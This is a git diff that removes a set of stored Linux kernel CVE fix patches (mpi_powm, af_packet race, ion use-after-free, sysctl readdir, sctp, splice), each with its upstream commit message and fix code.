@@ -1,34 +0,0 @@
-From 6997dcb7ade1315474855821e64782205cb0b53a Mon Sep 17 00:00:00 2001
-From: Mohammed Khajapasha <mkhaja@codeaurora.org>
-Date: Tue, 28 Jun 2016 11:55:34 +0530
-Subject: msm-core: use get_user() API to read userspace data/settings
-
-Currently userspace data is getting accessed directly
-and leading to crash, So use get_user() API to copy
-userspace data/settings to kernel space.
-
-Change-Id: I3a75ec9503d8207829640bf88e1c3160bf72c9f0
-Signed-off-by: Mohammed Khajapasha <mkhaja@codeaurora.org>
----
- drivers/power/qcom/msm-core.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/power/qcom/msm-core.c b/drivers/power/qcom/msm-core.c
-index 286c89f..8a55fd0 100644
---- a/drivers/power/qcom/msm-core.c
-+++ b/drivers/power/qcom/msm-core.c
-@@ -486,9 +486,9 @@ static long msm_core_ioctl(struct file *file, unsigned int cmd,
- 		return -EINVAL;
- 
- 	get_user(cluster, &argp->cluster);
--	mpidr = (argp->cluster << (MAX_CORES_PER_CLUSTER *
-+	mpidr = (cluster << (MAX_CORES_PER_CLUSTER *
- 			MAX_NUM_OF_CLUSTERS));
--	cpumask = argp->cpumask;
-+	get_user(cpumask, &argp->cpumask);
- 
- 	switch (cmd) {
- 	case EA_LEAKAGE:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8650/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8650/ANY/0001.patch
deleted file mode 100644
index e449ab06..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8650/ANY/0001.patch
+++ /dev/null
@@ -1,100 +0,0 @@
-From f5527fffff3f002b0a6b376163613b82f69de073 Mon Sep 17 00:00:00 2001
-From: Andrey Ryabinin <aryabinin@virtuozzo.com>
-Date: Thu, 24 Nov 2016 13:23:10 +0000
-Subject: mpi: Fix NULL ptr dereference in mpi_powm() [ver #3]
-
-This fixes CVE-2016-8650.
-
-If mpi_powm() is given a zero exponent, it wants to immediately return
-either 1 or 0, depending on the modulus.  However, if the result was
-initalised with zero limb space, no limbs space is allocated and a
-NULL-pointer exception ensues.
-
-Fix this by allocating a minimal amount of limb space for the result when
-the 0-exponent case when the result is 1 and not touching the limb space
-when the result is 0.
-
-This affects the use of RSA keys and X.509 certificates that carry them.
-
-BUG: unable to handle kernel NULL pointer dereference at           (null)
-IP: [<ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
-PGD 0
-Oops: 0002 [#1] SMP
-Modules linked in:
-CPU: 3 PID: 3014 Comm: keyctl Not tainted 4.9.0-rc6-fscache+ #278
-Hardware name: ASUS All Series/H97-PLUS, BIOS 2306 10/09/2014
-task: ffff8804011944c0 task.stack: ffff880401294000
-RIP: 0010:[<ffffffff8138ce5d>]  [<ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
-RSP: 0018:ffff880401297ad8  EFLAGS: 00010212
-RAX: 0000000000000000 RBX: ffff88040868bec0 RCX: ffff88040868bba0
-RDX: ffff88040868b260 RSI: ffff88040868bec0 RDI: ffff88040868bee0
-RBP: ffff880401297ba8 R08: 0000000000000000 R09: 0000000000000000
-R10: 0000000000000047 R11: ffffffff8183b210 R12: 0000000000000000
-R13: ffff8804087c7600 R14: 000000000000001f R15: ffff880401297c50
-FS:  00007f7a7918c700(0000) GS:ffff88041fb80000(0000) knlGS:0000000000000000
-CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-CR2: 0000000000000000 CR3: 0000000401250000 CR4: 00000000001406e0
-Stack:
- ffff88040868bec0 0000000000000020 ffff880401297b00 ffffffff81376cd4
- 0000000000000100 ffff880401297b10 ffffffff81376d12 ffff880401297b30
- ffffffff81376f37 0000000000000100 0000000000000000 ffff880401297ba8
-Call Trace:
- [<ffffffff81376cd4>] ? __sg_page_iter_next+0x43/0x66
- [<ffffffff81376d12>] ? sg_miter_get_next_page+0x1b/0x5d
- [<ffffffff81376f37>] ? sg_miter_next+0x17/0xbd
- [<ffffffff8138ba3a>] ? mpi_read_raw_from_sgl+0xf2/0x146
- [<ffffffff8132a95c>] rsa_verify+0x9d/0xee
- [<ffffffff8132acca>] ? pkcs1pad_sg_set_buf+0x2e/0xbb
- [<ffffffff8132af40>] pkcs1pad_verify+0xc0/0xe1
- [<ffffffff8133cb5e>] public_key_verify_signature+0x1b0/0x228
- [<ffffffff8133d974>] x509_check_for_self_signed+0xa1/0xc4
- [<ffffffff8133cdde>] x509_cert_parse+0x167/0x1a1
- [<ffffffff8133d609>] x509_key_preparse+0x21/0x1a1
- [<ffffffff8133c3d7>] asymmetric_key_preparse+0x34/0x61
- [<ffffffff812fc9f3>] key_create_or_update+0x145/0x399
- [<ffffffff812fe227>] SyS_add_key+0x154/0x19e
- [<ffffffff81001c2b>] do_syscall_64+0x80/0x191
- [<ffffffff816825e4>] entry_SYSCALL64_slow_path+0x25/0x25
-Code: 56 41 55 41 54 53 48 81 ec a8 00 00 00 44 8b 71 04 8b 42 04 4c 8b 67 18 45 85 f6 89 45 80 0f 84 b4 06 00 00 85 c0 75 2f 41 ff ce <49> c7 04 24 01 00 00 00 b0 01 75 0b 48 8b 41 18 48 83 38 01 0f
-RIP  [<ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
- RSP <ffff880401297ad8>
-CR2: 0000000000000000
----[ end trace d82015255d4a5d8d ]---
-
-Basically, this is a backport of a libgcrypt patch:
-
-	http://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=patch;h=6e1adb05d290aeeb1c230c763970695f4a538526
-
-Fixes: cdec9cb5167a ("crypto: GnuPG based MPI lib - source files (part 1)")
-Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
-Signed-off-by: David Howells <dhowells@redhat.com>
-cc: Dmitry Kasatkin <dmitry.kasatkin@gmail.com>
-cc: linux-ima-devel@lists.sourceforge.net
-cc: stable@vger.kernel.org
-Signed-off-by: James Morris <james.l.morris@oracle.com>
----
- lib/mpi/mpi-pow.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/lib/mpi/mpi-pow.c b/lib/mpi/mpi-pow.c
-index 5464c87..e24388a 100644
---- a/lib/mpi/mpi-pow.c
-+++ b/lib/mpi/mpi-pow.c
-@@ -64,8 +64,13 @@ int mpi_powm(MPI res, MPI base, MPI exp, MPI mod)
- 	if (!esize) {
- 		/* Exponent is zero, result is 1 mod MOD, i.e., 1 or 0
- 		 * depending on if MOD equals 1.  */
--		rp[0] = 1;
- 		res->nlimbs = (msize == 1 && mod->d[0] == 1) ? 0 : 1;
-+		if (res->nlimbs) {
-+			if (mpi_resize(res, 1) < 0)
-+				goto enomem;
-+			rp = res->d;
-+			rp[0] = 1;
-+		}
- 		res->sign = 0;
- 		goto leave;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8655/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8655/ANY/0001.patch
deleted file mode 100644
index 0cded9fd..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8655/ANY/0001.patch
+++ /dev/null
@@ -1,92 +0,0 @@
-From 84ac7260236a49c79eede91617700174c2c19b0c Mon Sep 17 00:00:00 2001
-From: Philip Pettersson <philip.pettersson@gmail.com>
-Date: Wed, 30 Nov 2016 14:55:36 -0800
-Subject: packet: fix race condition in packet_set_ring
-
-When packet_set_ring creates a ring buffer it will initialize a
-struct timer_list if the packet version is TPACKET_V3. This value
-can then be raced by a different thread calling setsockopt to
-set the version to TPACKET_V1 before packet_set_ring has finished.
-
-This leads to a use-after-free on a function pointer in the
-struct timer_list when the socket is closed as the previously
-initialized timer will not be deleted.
-
-The bug is fixed by taking lock_sock(sk) in packet_setsockopt when
-changing the packet version while also taking the lock at the start
-of packet_set_ring.
-
-Fixes: f6fb8f100b80 ("af-packet: TPACKET_V3 flexible buffer implementation.")
-Signed-off-by: Philip Pettersson <philip.pettersson@gmail.com>
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/packet/af_packet.c | 18 ++++++++++++------
- 1 file changed, 12 insertions(+), 6 deletions(-)
-
-diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
-index d2238b2..dd23323 100644
---- a/net/packet/af_packet.c
-+++ b/net/packet/af_packet.c
-@@ -3648,19 +3648,25 @@ packet_setsockopt(struct socket *sock, int level, int optname, char __user *optv
- 
- 		if (optlen != sizeof(val))
- 			return -EINVAL;
--		if (po->rx_ring.pg_vec || po->tx_ring.pg_vec)
--			return -EBUSY;
- 		if (copy_from_user(&val, optval, sizeof(val)))
- 			return -EFAULT;
- 		switch (val) {
- 		case TPACKET_V1:
- 		case TPACKET_V2:
- 		case TPACKET_V3:
--			po->tp_version = val;
--			return 0;
-+			break;
- 		default:
- 			return -EINVAL;
- 		}
-+		lock_sock(sk);
-+		if (po->rx_ring.pg_vec || po->tx_ring.pg_vec) {
-+			ret = -EBUSY;
-+		} else {
-+			po->tp_version = val;
-+			ret = 0;
-+		}
-+		release_sock(sk);
-+		return ret;
- 	}
- 	case PACKET_RESERVE:
- 	{
-@@ -4164,6 +4170,7 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
- 	/* Added to avoid minimal code churn */
- 	struct tpacket_req *req = &req_u->req;
- 
-+	lock_sock(sk);
- 	/* Opening a Tx-ring is NOT supported in TPACKET_V3 */
- 	if (!closing && tx_ring && (po->tp_version > TPACKET_V2)) {
- 		net_warn_ratelimited("Tx-ring is not supported.\n");
-@@ -4245,7 +4252,6 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
- 			goto out;
- 	}
- 
--	lock_sock(sk);
- 
- 	/* Detach socket from network */
- 	spin_lock(&po->bind_lock);
-@@ -4294,11 +4300,11 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
- 		if (!tx_ring)
- 			prb_shutdown_retire_blk_timer(po, rb_queue);
- 	}
--	release_sock(sk);
- 
- 	if (pg_vec)
- 		free_pg_vec(pg_vec, order, req->tp_block_nr);
- out:
-+	release_sock(sk);
- 	return err;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-9120/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9120/ANY/0001.patch
deleted file mode 100644
index 7f79fcd2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9120/ANY/0001.patch
+++ /dev/null
@@ -1,178 +0,0 @@
-From 9590232bb4f4cc824f3425a6e1349afbe6d6d2b7 Mon Sep 17 00:00:00 2001
-From: EunTaik Lee <eun.taik.lee@samsung.com>
-Date: Wed, 24 Feb 2016 04:38:06 +0000
-Subject: staging/android/ion : fix a race condition in the ion driver
-
-There is a use-after-free problem in the ion driver.
-This is caused by a race condition in the ion_ioctl()
-function.
-
-A handle has ref count of 1 and two tasks on different
-cpus calls ION_IOC_FREE simultaneously.
-
-cpu 0                                   cpu 1
--------------------------------------------------------
-ion_handle_get_by_id()
-(ref == 2)
-                            ion_handle_get_by_id()
-                            (ref == 3)
-
-ion_free()
-(ref == 2)
-
-ion_handle_put()
-(ref == 1)
-
-                            ion_free()
-                            (ref == 0 so ion_handle_destroy() is
-                            called
-                            and the handle is freed.)
-
-                            ion_handle_put() is called and it
-                            decreases the slub's next free pointer
-
-The problem is detected as an unaligned access in the
-spin lock functions since it uses load exclusive
- instruction. In some cases it corrupts the slub's
-free pointer which causes a mis-aligned access to the
-next free pointer.(kmalloc returns a pointer like
-ffffc0745b4580aa). And it causes lots of other
-hard-to-debug problems.
-
-This symptom is caused since the first member in the
-ion_handle structure is the reference count and the
-ion driver decrements the reference after it has been
-freed.
-
-To fix this problem client->lock mutex is extended
-to protect all the codes that uses the handle.
-
-Signed-off-by: Eun Taik Lee <eun.taik.lee@samsung.com>
-Reviewed-by: Laura Abbott <labbott@redhat.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/staging/android/ion/ion.c | 55 ++++++++++++++++++++++++++++++---------
- 1 file changed, 42 insertions(+), 13 deletions(-)
- mode change 100644 => 100755 drivers/staging/android/ion/ion.c
-
-diff --git a/drivers/staging/android/ion/ion.c b/drivers/staging/android/ion/ion.c
-old mode 100644
-new mode 100755
-index 7ff2a7e..33b390e
---- a/drivers/staging/android/ion/ion.c
-+++ b/drivers/staging/android/ion/ion.c
-@@ -387,13 +387,22 @@ static void ion_handle_get(struct ion_handle *handle)
- 	kref_get(&handle->ref);
- }
- 
--static int ion_handle_put(struct ion_handle *handle)
-+static int ion_handle_put_nolock(struct ion_handle *handle)
-+{
-+	int ret;
-+
-+	ret = kref_put(&handle->ref, ion_handle_destroy);
-+
-+	return ret;
-+}
-+
-+int ion_handle_put(struct ion_handle *handle)
- {
- 	struct ion_client *client = handle->client;
- 	int ret;
- 
- 	mutex_lock(&client->lock);
--	ret = kref_put(&handle->ref, ion_handle_destroy);
-+	ret = ion_handle_put_nolock(handle);
- 	mutex_unlock(&client->lock);
- 
- 	return ret;
-@@ -417,20 +426,30 @@ static struct ion_handle *ion_handle_lookup(struct ion_client *client,
- 	return ERR_PTR(-EINVAL);
- }
- 
--static struct ion_handle *ion_handle_get_by_id(struct ion_client *client,
-+static struct ion_handle *ion_handle_get_by_id_nolock(struct ion_client *client,
- 						int id)
- {
- 	struct ion_handle *handle;
- 
--	mutex_lock(&client->lock);
- 	handle = idr_find(&client->idr, id);
- 	if (handle)
- 		ion_handle_get(handle);
--	mutex_unlock(&client->lock);
- 
- 	return handle ? handle : ERR_PTR(-EINVAL);
- }
- 
-+struct ion_handle *ion_handle_get_by_id(struct ion_client *client,
-+						int id)
-+{
-+	struct ion_handle *handle;
-+
-+	mutex_lock(&client->lock);
-+	handle = ion_handle_get_by_id_nolock(client, id);
-+	mutex_unlock(&client->lock);
-+
-+	return handle;
-+}
-+
- static bool ion_handle_validate(struct ion_client *client,
- 				struct ion_handle *handle)
- {
-@@ -532,22 +551,28 @@ struct ion_handle *ion_alloc(struct ion_client *client, size_t len,
- }
- EXPORT_SYMBOL(ion_alloc);
- 
--void ion_free(struct ion_client *client, struct ion_handle *handle)
-+static void ion_free_nolock(struct ion_client *client, struct ion_handle *handle)
- {
- 	bool valid_handle;
- 
- 	BUG_ON(client != handle->client);
- 
--	mutex_lock(&client->lock);
- 	valid_handle = ion_handle_validate(client, handle);
- 
- 	if (!valid_handle) {
- 		WARN(1, "%s: invalid handle passed to free.\n", __func__);
--		mutex_unlock(&client->lock);
- 		return;
- 	}
-+	ion_handle_put_nolock(handle);
-+}
-+
-+void ion_free(struct ion_client *client, struct ion_handle *handle)
-+{
-+	BUG_ON(client != handle->client);
-+
-+	mutex_lock(&client->lock);
-+	ion_free_nolock(client, handle);
- 	mutex_unlock(&client->lock);
--	ion_handle_put(handle);
- }
- EXPORT_SYMBOL(ion_free);
- 
-@@ -1332,11 +1357,15 @@ static long ion_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 	{
- 		struct ion_handle *handle;
- 
--		handle = ion_handle_get_by_id(client, data.handle.handle);
--		if (IS_ERR(handle))
-+		mutex_lock(&client->lock);
-+		handle = ion_handle_get_by_id_nolock(client, data.handle.handle);
-+		if (IS_ERR(handle)) {
-+			mutex_unlock(&client->lock);
- 			return PTR_ERR(handle);
--		ion_free(client, handle);
--		ion_handle_put(handle);
-+		}
-+		ion_free_nolock(client, handle);
-+		ion_handle_put_nolock(handle);
-+		mutex_unlock(&client->lock);
- 		break;
- 	}
- 	case ION_IOC_SHARE:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-9191/3.11-^4.8/0001.patch b/Patches/Linux_CVEs/CVE-2016-9191/3.11-^4.8/0001.patch
deleted file mode 100644
index cb95d37f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9191/3.11-^4.8/0001.patch
+++ /dev/null
@@ -1,87 +0,0 @@
-From 93362fa47fe98b62e4a34ab408c4a418432e7939 Mon Sep 17 00:00:00 2001
-From: Zhou Chengming <zhouchengming1@huawei.com>
-Date: Fri, 6 Jan 2017 09:32:32 +0800
-Subject: sysctl: Drop reference added by grab_header in proc_sys_readdir
-
-Fixes CVE-2016-9191, proc_sys_readdir doesn't drop reference
-added by grab_header when return from !dir_emit_dots path.
-It can cause any path called unregister_sysctl_table will
-wait forever.
-
-The calltrace of CVE-2016-9191:
-
-[ 5535.960522] Call Trace:
-[ 5535.963265]  [<ffffffff817cdaaf>] schedule+0x3f/0xa0
-[ 5535.968817]  [<ffffffff817d33fb>] schedule_timeout+0x3db/0x6f0
-[ 5535.975346]  [<ffffffff817cf055>] ? wait_for_completion+0x45/0x130
-[ 5535.982256]  [<ffffffff817cf0d3>] wait_for_completion+0xc3/0x130
-[ 5535.988972]  [<ffffffff810d1fd0>] ? wake_up_q+0x80/0x80
-[ 5535.994804]  [<ffffffff8130de64>] drop_sysctl_table+0xc4/0xe0
-[ 5536.001227]  [<ffffffff8130de17>] drop_sysctl_table+0x77/0xe0
-[ 5536.007648]  [<ffffffff8130decd>] unregister_sysctl_table+0x4d/0xa0
-[ 5536.014654]  [<ffffffff8130deff>] unregister_sysctl_table+0x7f/0xa0
-[ 5536.021657]  [<ffffffff810f57f5>] unregister_sched_domain_sysctl+0x15/0x40
-[ 5536.029344]  [<ffffffff810d7704>] partition_sched_domains+0x44/0x450
-[ 5536.036447]  [<ffffffff817d0761>] ? __mutex_unlock_slowpath+0x111/0x1f0
-[ 5536.043844]  [<ffffffff81167684>] rebuild_sched_domains_locked+0x64/0xb0
-[ 5536.051336]  [<ffffffff8116789d>] update_flag+0x11d/0x210
-[ 5536.057373]  [<ffffffff817cf61f>] ? mutex_lock_nested+0x2df/0x450
-[ 5536.064186]  [<ffffffff81167acb>] ? cpuset_css_offline+0x1b/0x60
-[ 5536.070899]  [<ffffffff810fce3d>] ? trace_hardirqs_on+0xd/0x10
-[ 5536.077420]  [<ffffffff817cf61f>] ? mutex_lock_nested+0x2df/0x450
-[ 5536.084234]  [<ffffffff8115a9f5>] ? css_killed_work_fn+0x25/0x220
-[ 5536.091049]  [<ffffffff81167ae5>] cpuset_css_offline+0x35/0x60
-[ 5536.097571]  [<ffffffff8115aa2c>] css_killed_work_fn+0x5c/0x220
-[ 5536.104207]  [<ffffffff810bc83f>] process_one_work+0x1df/0x710
-[ 5536.110736]  [<ffffffff810bc7c0>] ? process_one_work+0x160/0x710
-[ 5536.117461]  [<ffffffff810bce9b>] worker_thread+0x12b/0x4a0
-[ 5536.123697]  [<ffffffff810bcd70>] ? process_one_work+0x710/0x710
-[ 5536.130426]  [<ffffffff810c3f7e>] kthread+0xfe/0x120
-[ 5536.135991]  [<ffffffff817d4baf>] ret_from_fork+0x1f/0x40
-[ 5536.142041]  [<ffffffff810c3e80>] ? kthread_create_on_node+0x230/0x230
-
-One cgroup maintainer mentioned that "cgroup is trying to offline
-a cpuset css, which takes place under cgroup_mutex.  The offlining
-ends up trying to drain active usages of a sysctl table which apprently
-is not happening."
-The real reason is that proc_sys_readdir doesn't drop reference added
-by grab_header when return from !dir_emit_dots path. So this cpuset
-offline path will wait here forever.
-
-See here for details: http://www.openwall.com/lists/oss-security/2016/11/04/13
-
-Fixes: f0c3b5093add ("[readdir] convert procfs")
-Cc: stable@vger.kernel.org
-Reported-by: CAI Qian <caiqian@redhat.com>
-Tested-by: Yang Shukui <yangshukui@huawei.com>
-Signed-off-by: Zhou Chengming <zhouchengming1@huawei.com>
-Acked-by: Al Viro <viro@ZenIV.linux.org.uk>
-Signed-off-by: Eric W. Biederman <ebiederm@xmission.com>
----
- fs/proc/proc_sysctl.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c
-index 55313d9..d4e37ac 100644
---- a/fs/proc/proc_sysctl.c
-+++ b/fs/proc/proc_sysctl.c
-@@ -709,7 +709,7 @@ static int proc_sys_readdir(struct file *file, struct dir_context *ctx)
- 	ctl_dir = container_of(head, struct ctl_dir, header);
- 
- 	if (!dir_emit_dots(file, ctx))
--		return 0;
-+		goto out;
- 
- 	pos = 2;
- 
-@@ -719,6 +719,7 @@ static int proc_sys_readdir(struct file *file, struct dir_context *ctx)
- 			break;
- 		}
- 	}
-+out:
- 	sysctl_head_finish(head);
- 	return 0;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-9555/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9555/ANY/0001.patch
deleted file mode 100644
index c96ff897..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9555/ANY/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 Mon Sep 17 00:00:00 2001
-From: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
-Date: Tue, 25 Oct 2016 14:27:39 -0200
-Subject: [PATCH] sctp: validate chunk len before actually using it
-
-Andrey Konovalov reported that KASAN detected that SCTP was using a slab
-beyond the boundaries. It was caused because when handling out of the
-blue packets in function sctp_sf_ootb() it was checking the chunk len
-only after already processing the first chunk, validating only for the
-2nd and subsequent ones.
-
-The fix is to just move the check upwards so it's also validated for the
-1st chunk.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
-Reviewed-by: Xin Long <lucien.xin@gmail.com>
-Acked-by: Neil Horman <nhorman@tuxdriver.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/sctp/sm_statefuns.c | 12 ++++++------
- 1 file changed, 6 insertions(+), 6 deletions(-)
-
-diff --git a/net/sctp/sm_statefuns.c b/net/sctp/sm_statefuns.c
-index 026e3bca4a94b..8ec20a64a3f80 100644
---- a/net/sctp/sm_statefuns.c
-+++ b/net/sctp/sm_statefuns.c
-@@ -3422,6 +3422,12 @@ sctp_disposition_t sctp_sf_ootb(struct net *net,
- 			return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
- 						  commands);
- 
-+		/* Report violation if chunk len overflows */
-+		ch_end = ((__u8 *)ch) + SCTP_PAD4(ntohs(ch->length));
-+		if (ch_end > skb_tail_pointer(skb))
-+			return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
-+						  commands);
-+
- 		/* Now that we know we at least have a chunk header,
- 		 * do things that are type appropriate.
- 		 */
-@@ -3453,12 +3459,6 @@ sctp_disposition_t sctp_sf_ootb(struct net *net,
- 			}
- 		}
- 
--		/* Report violation if chunk len overflows */
--		ch_end = ((__u8 *)ch) + SCTP_PAD4(ntohs(ch->length));
--		if (ch_end > skb_tail_pointer(skb))
--			return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
--						  commands);
--
- 		ch = (sctp_chunkhdr_t *) ch_end;
- 	} while (ch_end < skb_tail_pointer(skb));
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch
deleted file mode 100644
index d5e2e4dc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From f569aee1087fa3da9712952fc00daa72b028424c Mon Sep 17 00:00:00 2001
-From: Linus Torvalds <torvalds@linux-foundation.org>
-Date: Sat, 07 Jan 2017 19:14:29 +0100
-Subject: [PATCH] splice: introduce FMODE_SPLICE_READ and FMODE_SPLICE_WRITE
-
-Introduce FMODE_SPLICE_READ and FMODE_SPLICE_WRITE. These modes check
-whether it is legal to read or write a file using splice. Both get
-automatically set on regular files and are not checked when a 'struct
-fileoperations' includes the splice_{read,write} methods.
-
-Change-Id: Ice6a3fab20bf0ac131f8d908f4bb0f7dc34bf4e3
-Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
-Cc: Al Viro <viro@zeniv.linux.org.uk>
-Signed-off-by: Johannes Thumshirn <jthumshirn@suse.de>
----
-
-diff --git a/fs/open.c b/fs/open.c
-index 9bf7fa0..e0e2a37 100644
---- a/fs/open.c
-+++ b/fs/open.c
-@@ -680,6 +680,10 @@
- 		return 0;
- 	}
- 
-+	if (S_ISREG(inode->i_mode))
-+		f->f_mode |= FMODE_SPLICE_WRITE | FMODE_SPLICE_READ;
-+
-+
- 	f->f_op = fops_get(inode->i_fop);
- 
- 	error = security_file_open(f, cred);
-diff --git a/fs/splice.c b/fs/splice.c
-index f183f13..8ba78ce 100644
---- a/fs/splice.c
-+++ b/fs/splice.c
-@@ -381,6 +381,9 @@
- 		index++;
- 	}
- 
-+	if (unlikely(!(in->f_mode & FMODE_SPLICE_READ)))
-+		return -EINVAL;
-+
- 	/*
- 	 * Now loop over the map and see if we need to start IO on any
- 	 * pages, fill in the partial map, etc.
-@@ -1084,6 +1087,9 @@
- {
- 	ssize_t ret;
- 
-+	if (unlikely(!(out->f_mode & FMODE_SPLICE_WRITE)))
-+		return -EINVAL;
-+
- 	ret = splice_from_pipe(pipe, out, ppos, len, flags, write_pipe_buf);
- 	if (ret > 0)
- 		*ppos += ret;
-diff --git a/include/linux/fs.h b/include/linux/fs.h
-index e6f1180..78300ef 100644
---- a/include/linux/fs.h
-+++ b/include/linux/fs.h
-@@ -125,6 +125,11 @@
- /* File was opened by fanotify and shouldn't generate fanotify events */
- #define FMODE_NONOTIFY		((__force fmode_t)0x1000000)
- 
-+/* File can be read using splice */
-+#define FMODE_SPLICE_READ       ((__force fmode_t)0x8000000)
-+/* File can be written using splice */
-+#define FMODE_SPLICE_WRITE      ((__force fmode_t)0x10000000)
-+
- /*
-  * Flag for rw_copy_check_uvector and compat_rw_copy_check_uvector
-  * that indicates that they should check the contents of the iovec are
diff --git a/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch.base64
deleted file mode 100644
index 843461d6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9576/3.10/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSBmNTY5YWVlMTA4N2ZhM2RhOTcxMjk1MmZjMDBkYWE3MmIwMjg0MjRjIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBMaW51cyBUb3J2YWxkcyA8dG9ydmFsZHNAbGludXgtZm91bmRhdGlvbi5vcmc+CkRhdGU6IFNhdCwgMDcgSmFuIDIwMTcgMTk6MTQ6MjkgKzAxMDAKU3ViamVjdDogW1BBVENIXSBzcGxpY2U6IGludHJvZHVjZSBGTU9ERV9TUExJQ0VfUkVBRCBhbmQgRk1PREVfU1BMSUNFX1dSSVRFCgpJbnRyb2R1Y2UgRk1PREVfU1BMSUNFX1JFQUQgYW5kIEZNT0RFX1NQTElDRV9XUklURS4gVGhlc2UgbW9kZXMgY2hlY2sKd2hldGhlciBpdCBpcyBsZWdhbCB0byByZWFkIG9yIHdyaXRlIGEgZmlsZSB1c2luZyBzcGxpY2UuIEJvdGggZ2V0CmF1dG9tYXRpY2FsbHkgc2V0IG9uIHJlZ3VsYXIgZmlsZXMgYW5kIGFyZSBub3QgY2hlY2tlZCB3aGVuIGEgJ3N0cnVjdApmaWxlb3BlcmF0aW9ucycgaW5jbHVkZXMgdGhlIHNwbGljZV97cmVhZCx3cml0ZX0gbWV0aG9kcy4KCkNoYW5nZS1JZDogSWNlNmEzZmFiMjBiZjBhYzEzMWY4ZDkwOGY0YmIwZjdkYzM0YmY0ZTMKU3VnZ2VzdGVkLWJ5OiBMaW51cyBUb3J2YWxkcyA8dG9ydmFsZHNAbGludXgtZm91bmRhdGlvbi5vcmc+CkNjOiBBbCBWaXJvIDx2aXJvQHplbml2LmxpbnV4Lm9yZy51az4KU2lnbmVkLW9mZi1ieTogSm9oYW5uZXMgVGh1bXNoaXJuIDxqdGh1bXNoaXJuQHN1c2UuZGU+Ci0tLQoKZGlmZiAtLWdpdCBhL2ZzL29wZW4uYyBiL2ZzL29wZW4uYwppbmRleCA5YmY3ZmEwLi5lMGUyYTM3IDEwMDY0NAotLS0gYS9mcy9vcGVuLmMKKysrIGIvZnMvb3Blbi5jCkBAIC02ODAsNiArNjgwLDEwIEBACiAJCXJldHVybiAwOwogCX0KIAorCWlmIChTX0lTUkVHKGlub2RlLT5pX21vZGUpKQorCQlmLT5mX21vZGUgfD0gRk1PREVfU1BMSUNFX1dSSVRFIHwgRk1PREVfU1BMSUNFX1JFQUQ7CisKKwogCWYtPmZfb3AgPSBmb3BzX2dldChpbm9kZS0+aV9mb3ApOwogCiAJZXJyb3IgPSBzZWN1cml0eV9maWxlX29wZW4oZiwgY3JlZCk7CmRpZmYgLS1naXQgYS9mcy9zcGxpY2UuYyBiL2ZzL3NwbGljZS5jCmluZGV4IGYxODNmMTMuLjhiYTc4Y2UgMTAwNjQ0Ci0tLSBhL2ZzL3NwbGljZS5jCisrKyBiL2ZzL3NwbGljZS5jCkBAIC0zODEsNiArMzgxLDkgQEAKIAkJaW5kZXgrKzsKIAl9CiAKKwlpZiAodW5saWtlbHkoIShpbi0+Zl9tb2RlICYgRk1PREVfU1BMSUNFX1JFQUQpKSkKKwkJcmV0dXJuIC1FSU5WQUw7CisKIAkvKgogCSAqIE5vdyBsb29wIG92ZXIgdGhlIG1hcCBhbmQgc2VlIGlmIHdlIG5lZWQgdG8gc3RhcnQgSU8gb24gYW55CiAJICogcGFnZXMsIGZpbGwgaW4gdGhlIHBhcnRpYWwgbWFwLCBldGMuCkBAIC0xMDg0LDYgKzEwODcsOSBAQAogewogCXNzaXplX3QgcmV0OwogCisJaWYgKHVubGlrZWx5KC